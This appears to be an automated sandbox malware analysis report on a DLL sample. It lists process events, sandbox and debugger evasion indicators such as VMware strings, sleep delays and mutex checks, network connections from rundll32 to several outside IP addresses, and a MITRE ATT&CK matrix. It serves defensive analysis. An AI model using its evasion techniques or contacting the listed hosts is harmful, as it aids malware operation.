Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_11-16794
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C75E rdtsc 7_2_1001C75E
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7548Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_11-16784
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7876Thread sleep count: 7548 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7876Thread sleep time: -13586400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7884Thread sleep count: 52 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7820Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2936Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 564Thread sleep time: -3000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1916Thread sleep time: -1620000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7820Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2040Thread sleep count: 100 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2040Thread sleep time: -30000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 576Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7604Thread sleep time: -3600000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: rundll32.exe, 0000000B.00000002.3139060797.00000000032DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: istry\Machine\Software\Classes\Applications\\VMwareHostOpen.
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000B.00000003.1819049424.00000000030D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 0000000B.00000002.3139060797.00000000032DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8B4
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 0000000B.00000002.3136737776.000000000303B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C75E rdtsc 7_2_1001C75E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CCF8 LdrInitializeThunk,7_2_1000CCF8

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.236 18963Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.235 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.133.8.92 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
File and Directory Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		4
Obfuscated Files or Information		LSASS Memory11
System Information Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
Process Injection		1
Software Packing		Security Account Manager31
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		1
DLL Side-Loading		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading		LSA Secrets1
Process Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync1
